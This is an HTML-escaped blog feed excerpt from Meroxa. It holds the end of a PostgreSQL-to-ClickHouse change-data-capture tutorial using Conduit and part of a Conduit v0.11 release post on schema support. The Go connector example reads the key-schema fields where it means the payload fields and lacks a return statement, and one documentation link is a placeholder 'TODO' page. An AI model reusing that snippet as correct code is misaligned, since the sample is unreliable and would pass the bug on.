# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;DESTINATION&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; clickhouse&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;sink
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;clickhouse
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://yourusername:yourpassword@yourhost:8443/yourdatabase?secure=true&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_purchases&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;keyColumns&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Explanation of YAML Components&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;pipelines&lt;/strong&gt;: Defines the pipeline configuration.&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;id&lt;/strong&gt;: Unique identifier for the pipeline.&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;status&lt;/strong&gt;: Defines the pipeline’s status (running/stopped).&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;description&lt;/strong&gt;: A brief description of the pipeline’s purpose.&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;Connectors&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;Source Connector (pg-source)&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;type&lt;/strong&gt;: Specifies the connector type (source).&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;plugin&lt;/strong&gt;: The plugin type (PostgreSQL).&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;settings&lt;/strong&gt;: Contains the PostgreSQL connection settings.&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;Destination Connector (clickhouse-sink)&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;type&lt;/strong&gt;: Specifies the connector type (destination).&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;plugin&lt;/strong&gt;: The plugin type (ClickHouse).&lt;/p&gt;
&lt;p&gt;•	&lt;strong&gt;settings&lt;/strong&gt;: Contains the ClickHouse connection settings.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Run the Pipeline:&lt;/strong&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the directory containing your YAML file. Simply run Conduit by using the following command:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/fb154251bb6705696502814163481afd/e8950/Screenshot_2024-08-26_at_3.30.59_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAABYlAAAWJQFJUiTwAAABE0lEQVR42l2S3Y6EIAyFef9Xmr3TzF4aH0OTAREEAfVsT43JZkialv58tFXjvUfOGSllXNeFWqvqvBes64pt23CeJ2JMCCFi33cUyTmOQ/3UF4BSinLMNE1yqViWBX3fYxgGjOMIt3h4HwRQUCXOAublvIt/VYlxg7NOm2EeY2aeZ/AQ+Hr9oOs6vN+/mD4rbKiIuerLLF4EEkRrA2J/BGZFeCeUtnHOKfAeK2onMjN20a019dda1B9CEHiSMZuuw1qrNTxcFe8mpaQO7oJBBgjhrlq790QYYwRS8yEC2Qzlyef3MAzyI1D+n28gx2YBhTWEP1A2w0ZomwfwDeSCWfgk0+aenVtu4Bp0RP4FrGUDfOAPOUgdmDF6VucAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example data being transferred from PostgreSQL into Clickhouse.&quot;
        title=&quot;&quot;
        src=&quot;/static/fb154251bb6705696502814163481afd/5a190/Screenshot_2024-08-26_at_3.30.59_PM.png&quot;
        srcset=&quot;/static/fb154251bb6705696502814163481afd/772e8/Screenshot_2024-08-26_at_3.30.59_PM.png 200w,
/static/fb154251bb6705696502814163481afd/e17e5/Screenshot_2024-08-26_at_3.30.59_PM.png 400w,
/static/fb154251bb6705696502814163481afd/5a190/Screenshot_2024-08-26_at_3.30.59_PM.png 800w,
/static/fb154251bb6705696502814163481afd/c1b63/Screenshot_2024-08-26_at_3.30.59_PM.png 1200w,
/static/fb154251bb6705696502814163481afd/29007/Screenshot_2024-08-26_at_3.30.59_PM.png 1600w,
/static/fb154251bb6705696502814163481afd/e8950/Screenshot_2024-08-26_at_3.30.59_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example data being transferred from PostgreSQL into Clickhouse.&lt;/p&gt;
&lt;p&gt;This will automatically execute any pipeline files located in the ./pipelines directory.&lt;/p&gt;
&lt;p&gt;Access the Conduit UI at localhost:8080 to monitor and manage the pipeline.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/e8950/Screenshot_2024-08-26_at_3.58.57_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAABYlAAAWJQFJUiTwAAABHUlEQVR42pWQTU7DMBCFcxXECtixQOy65gDcgQOwYcORQNyAE9ANQhUrhIqSkqSO45/Yjt3H2CWl0AhEpKdJ7Jlv8l52cXkNIRXCaoXee1BBCOv3MfkQ6D7A+wDb9+icg6M63GeTs3Ms3msY2+N1nuPx6Rl5UUKqjhbpHTVNi3rZwJket9MHXN3d4H42g6d5LhSyw+NJAnbGoawY5m8FqpqhpcufUN5KNFykKum7JPDLokTJmk1vtndwkoC6s5+DKlmI1pI9ymAQbwWMsYiPI3uVEHBkWemvxdn+0ekGGLczsqQ7k5qMXeczSCpNZ5by81BUp0UO6yhHmm3FCDDCloynvxzLb1vRstF25/wbMDUq/SdsUMz5V+BYw3/1ASSdVuS5lWodAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Conduit UI showcasing current pipelines running. You can have as many pipelines you want here.&quot;
        title=&quot;&quot;
        src=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/5a190/Screenshot_2024-08-26_at_3.58.57_PM.png&quot;
        srcset=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/772e8/Screenshot_2024-08-26_at_3.58.57_PM.png 200w,
/static/557bf9d478dc7dbf72550dbe1ff98285/e17e5/Screenshot_2024-08-26_at_3.58.57_PM.png 400w,
/static/557bf9d478dc7dbf72550dbe1ff98285/5a190/Screenshot_2024-08-26_at_3.58.57_PM.png 800w,
/static/557bf9d478dc7dbf72550dbe1ff98285/c1b63/Screenshot_2024-08-26_at_3.58.57_PM.png 1200w,
/static/557bf9d478dc7dbf72550dbe1ff98285/29007/Screenshot_2024-08-26_at_3.58.57_PM.png 1600w,
/static/557bf9d478dc7dbf72550dbe1ff98285/e8950/Screenshot_2024-08-26_at_3.58.57_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Conduit UI showcasing current pipelines running. You can have as many pipelines you want here.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/e8950/Screenshot_2024-08-26_at_3.59.36_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 29.500000000000004%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAABYlAAAWJQFJUiTwAAABCklEQVR42p2R626CQBSEff9Xq1HwUiwqsKJopUUEQ9W9fD1LNLF/O8lkNjnJMDMMvsqaU9ViDeg7dJ1mmeQMg4jR5INwFjOZL3sG8h5PY96CdxK1o6pq2ssFay3OOoxxDL6PHbmSw9kJ4dKA2hxR6pOiqJgtMobTRc/FSlEcjuz2JWp74Ny0nGoJdG7QWuOcGGptaFv/FYn4gNociFc5abZnFiWM55JM0kVxRropWGdbMlGPuxjVYuzVY8AL3EPXasswjKTeB4FUDR98Vva3VZpzvd9opPK+LGm7jp/b7a/hE36fkZiFL2av9Lck22GlYne9UjVNr8aYfxrKz0pV0W/mqxqZzU9nreMXodO/3ioMmaEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example Conduit pipeline showcasing the connectors used and ability to inspect the data stream.&quot;
        title=&quot;&quot;
        src=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/5a190/Screenshot_2024-08-26_at_3.59.36_PM.png&quot;
        srcset=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/772e8/Screenshot_2024-08-26_at_3.59.36_PM.png 200w,
/static/1b1f32e5ef9345bed5221389db55fa18/e17e5/Screenshot_2024-08-26_at_3.59.36_PM.png 400w,
/static/1b1f32e5ef9345bed5221389db55fa18/5a190/Screenshot_2024-08-26_at_3.59.36_PM.png 800w,
/static/1b1f32e5ef9345bed5221389db55fa18/c1b63/Screenshot_2024-08-26_at_3.59.36_PM.png 1200w,
/static/1b1f32e5ef9345bed5221389db55fa18/29007/Screenshot_2024-08-26_at_3.59.36_PM.png 1600w,
/static/1b1f32e5ef9345bed5221389db55fa18/e8950/Screenshot_2024-08-26_at_3.59.36_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example Conduit pipeline showcasing the connectors used and ability to inspect the data stream.&lt;/p&gt;
&lt;h3&gt;Use Cases for PostgreSQL to ClickHouse CDC&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Financial Services&lt;/strong&gt;: Real-time fraud detection and transaction monitoring become seamless with up-to-date data flowing from PostgreSQL to ClickHouse.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;E-commerce&lt;/strong&gt;: Enhance customer experience by providing real-time product recommendations and personalized marketing based on the latest data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IoT Applications&lt;/strong&gt;: Process and analyze massive streams of IoT data in real time, enabling predictive maintenance and operational efficiency.&lt;/p&gt;
&lt;h3&gt;Best Practices for Implementing CDC with Meroxa&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Plan Your Data Flow&lt;/strong&gt;: Understand your data sources and destinations, and plan the flow of data to ensure optimal performance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automate Data Transformations&lt;/strong&gt;: Use Meroxa’s transformation features to automate data cleaning and preparation, ensuring high-quality data in ClickHouse.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor Continuously&lt;/strong&gt;: Regularly monitor your CDC pipelines to identify and resolve any issues promptly, ensuring uninterrupted data flow.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Implementing PostgreSQL to ClickHouse CDC with Meroxa&apos;s Conduit Platform provides a powerful solution for real-time data integration and analytics. By leveraging Meroxa&apos;s robust platform, businesses can ensure data consistency, scalability, and ease of use, empowering them to make data-driven decisions with confidence. Stay tuned for part 2 where we show you how to stream data from MongoDB into ClickHouse.&lt;/p&gt;
&lt;p&gt;Ready to transform your data integration process? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a demo&lt;/a&gt; of Meroxa&apos;s Conduit Platform today and see how you can seamlessly integrate PostgreSQL with ClickHouse for real-time analytics and insights. Check out the full demo &lt;a href=&quot;https://youtu.be/UW4OxcRuOxQ?feature=shared&quot;&gt;video&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit v0.11 Unveils Powerful Schema Support for Enhanced Data Integration]]></title><description><![CDATA[We made it, Conduit v0.11 is here! In this latest release, we’ve focused on adding schema support, enabling you to detect schema changes and retain type information end-end. ]]></description><link>https://meroxa.com/blog/conduit-v011-unveils-powerful-schema-support-for-enhanced-data-integration</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-v011-unveils-powerful-schema-support-for-enhanced-data-integration</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Mon, 19 Aug 2024 17:35:07 GMT</pubDate><content:encoded>&lt;p&gt;We made it, Conduit v0.11 is here! In this latest release, we’ve focused on adding schema support, enabling you to detect schema changes and retain type information end-end. Our commitment is to make data integration more efficient and user-friendly, helping you optimize your data streaming workflows.&lt;/p&gt;
&lt;h2&gt;Schema Support&lt;/h2&gt;
&lt;p&gt;With the release of Conduit v0.11, one of the most significant enhancements is the support for schemas.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Highlights of Conduit v0.11&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Schema Support&lt;/strong&gt;: Manage and detect schema changes seamlessly. Conduit now preserves type information end-to-end, ensuring data integrity and type safety throughout the pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema Registry&lt;/strong&gt;: Integrated schema registry within Conduit, with compatibility for Confluent Schema Registry. Easily manage and fetch schemas without deploying separate services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connector Enhancements&lt;/strong&gt;: New and improved connector SDK for working with schemas, simplifying the process of data encoding, decoding, and transformation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processor Improvements&lt;/strong&gt;: Enhanced processor SDK with schema support, allowing for more accurate and reliable data processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Documentation Search&lt;/strong&gt;: Quickly find the information you need with our new search feature in the Conduit documentation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;The primary benefits of schema support include:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data Integrity: Ensures that data adheres to the expected structure, reducing the risk of errors and inconsistencies.&lt;/li&gt;
&lt;li&gt;Type Safety: Retains type information throughout the data pipeline, allowing for safe and accurate data processing.&lt;/li&gt;
&lt;li&gt;Future-Proofing: Prepares the system to handle evolving data structures, making it easier to adapt to changes without significant disruptions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the following sections, we will delve into the specifics of how schema support is implemented in Conduit, including the schema registry, connectors, processors, and additions to the OpenCDC record format.&lt;/p&gt;
&lt;h3&gt;Schema Registry&lt;/h3&gt;
&lt;p&gt;The Schema Registry is now a built-in component of Conduit, enabling the usage of schemas in Conduit pipelines out of the box without deploying a separate service.&lt;/p&gt;
&lt;p&gt;Check out the source of the &lt;a href=&quot;https://github.com/conduitIO/conduit-schema-registry&quot;&gt;Conduit Schema Registry&lt;/a&gt;. It is written in Go, meaning that it can be compiled into Conduit and is used internally as the default schema registry. We have also written a test suite, which runs against our schema registry as well as the Confluent Schema Registry, ensuring their compatibility. The Conduit Schema Registry currently supports only a subset of the features, however, the long-term goal is to make it fully compatible and allow it to be run as a standalone service.&lt;/p&gt;
&lt;p&gt;Conduit also allows you to configure an external schema registry that’s compatible with the Confluent Schema Registry API.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;schema-registry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;confluent&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;confluent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connection-string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8085&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This snippet of the &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; file shows how to configure Conduit to connect to a Confluent Schema Registry instance. Check out the &lt;a href=&quot;https://conduit.io/docs/features/schema-support/#schema-registry&quot;&gt;documentation&lt;/a&gt; for more information.&lt;/p&gt;
&lt;h3&gt;Schemas and OpenCDC records&lt;/h3&gt;
&lt;p&gt;We have added support for attaching schemas to OpenCDC records by introducing four standard metadata fields. These fields provide the required information to identify and fetch a specific schema from a schema registry.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.key.schema.subject&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;opencdc.key.schema.version&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;These fields contain the schema subject and version for the data in the &lt;code class=&quot;language-text&quot;&gt;.Key&lt;/code&gt; field of the OpenCDC record.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.payload.schema.subject&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;opencdc.payload.schema.version&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;These fields contain the schema subject and version for the data in the &lt;code class=&quot;language-text&quot;&gt;.Payload.Before&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;.Payload.After&lt;/code&gt; fields.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Connectors&lt;/h3&gt;
&lt;p&gt;The latest &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt; includes several enhancements to simplify working with schemas.&lt;/p&gt;
&lt;p&gt;First, we introduced the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk/schema&quot;&gt;schema&lt;/a&gt; package, which contains utilities for retrieving and creating schemas in connectors. These utilities interact with Conduit’s Schema Registry. The returned schema can be used to encode and decode data, as well as traverse the schema and apply it to the destination resource (e.g. creating a destination table with the correct types).&lt;/p&gt;
&lt;p&gt;Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; myConnector

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;context&quot;&lt;/span&gt;

	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-connector-sdk/schema&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-commons/opencdc&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;/* ... */&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keyVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keyVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadSchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// use keySchema and payloadSchema ...&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We also introduced source middleware that extracts an &lt;a href=&quot;https://avro.apache.org&quot;&gt;Avro&lt;/a&gt; schema from structured data and encodes the value into Avro raw data. This alleviates the issue of losing type information, which previously affected &lt;a href=&quot;https://conduit.io/docs/connectors/behavior/#standalone-vs-built-in-connectors&quot;&gt;standalone connectors&lt;/a&gt;. The source middleware is enabled by default in all connectors using the latest connector SDK, meaning that connectors don’t need any specific code to benefit from schema support.&lt;/p&gt;
&lt;p&gt;Additionally, all destination connectors benefit from another middleware, which works in the opposite manner to the source middleware. If a record contains the new metadata fields with a subject and version, it will fetch the schema and decode the data into structured data. This ensures that both the destination and source connectors can work with structured data while preserving the correct type information end-to-end.&lt;/p&gt;
&lt;p&gt;To find out more about the source and destination middleware check out &lt;a href=&quot;https://www.notion.so/meroxa/TODO&quot;&gt;the middleware documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Processors&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/conduitio/conduit-processor-sdk&quot;&gt;Processor SDK&lt;/a&gt; now includes schema support, similar to the Connector SDK, making it easier to work with structured data in processors.&lt;/p&gt;
